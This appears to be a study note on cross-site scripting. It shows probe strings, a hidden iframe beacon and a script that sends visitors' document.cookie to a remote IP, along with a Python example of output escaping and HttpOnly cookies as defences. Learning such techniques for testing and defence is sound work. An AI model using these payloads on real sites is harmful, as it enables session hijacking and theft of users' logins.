Cross Site Scripting

Identifying XSS Vulnerability

The best way to test a website for XSS vulnerability is to inject a piece of JS or HTML code into the comments or any input field. An example would be,

hello";<>

If this string is displayed with its special characters intact (none of them removed), the page is likely vulnerable to XSS. Next, the page can be tested with something more complex,

<script>alert("XSS")</script>

This code should pop up an alert dialog on the page.

Content Injection

Content injection can be used to load content into a website from a remote server, and it can also reveal which browser the user is using.

<iframe src=http://10.11.0.4/report height="0" width="0"></iframe>

Once the above code is included within a page, say as a comment, a request will be sent to the mentioned IP address whenever any user visits the page. A simple netcat listener can capture the request and display the browser details.

Stealing Cookies

Similar to the previous example, the session cookie of the user can also be sent to a remote server when appropriate code is included within the page. The following piece of code, when included within the page as a comment, will send the cookie details of every user visiting the page,

<script>new Image().src="http://10.11.0.4/cool.jpg?output="+document.cookie;</script>

There are certain limitations on the practicality of this code: the website must not set the HttpOnly flag on the cookie, since that denies JS access to it, and the host receiving the request should be a sub-domain of the website from which the cookie is being stolen.
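As an added defensive example (not part of these notes), the following Python puts the reflection check from the first section beside the two server-side controls that defeat these payloads: HTML-encoding user content before output, and setting HttpOnly on the session cookie. The function names are my own; the probe strings are the ones quoted above.

```python
import html

# Probe strings from the notes above, used as constructed sample input
PROBES = ['hello";<>', '<script>alert("XSS")</script>']


def render_comment_vulnerable(comment: str) -> str:
    """Vulnerable rendering: the comment is concatenated into HTML unchanged."""
    return f'<div class="comment">{comment}</div>'


def render_comment_safe(comment: str) -> str:
    """Hardened rendering: &, <, >, " and ' are HTML-encoded before output,
    so the browser shows the text instead of parsing it as markup."""
    return f'<div class="comment">{html.escape(comment, quote=True)}</div>'


def reflects_probe(probe: str, page: str) -> bool:
    """The check from the notes: True if the probe appears verbatim in the
    response, meaning its special characters were neither removed nor encoded."""
    return probe in page


def has_httponly(set_cookie: str) -> bool:
    """Parse a Set-Cookie header value and report whether HttpOnly is present.
    Attribute names are case-insensitive (RFC 6265)."""
    attrs = [part.strip().lower() for part in set_cookie.split(";")[1:]]
    return "httponly" in attrs


def session_cookie_header(value: str) -> str:
    """Build a Set-Cookie header whose cookie is invisible to document.cookie."""
    return f"session={value}; Path=/; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    for probe in PROBES:
        print(f"probe {probe!r}")
        print("  vulnerable page reflects it:", reflects_probe(probe, render_comment_vulnerable(probe)))
        print("  hardened page reflects it:  ", reflects_probe(probe, render_comment_safe(probe)))
    print("HttpOnly on hardened cookie:", has_httponly(session_cookie_header("example-session-id")))
```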

BeEF - Browser Exploitation Framework

COMING SOON
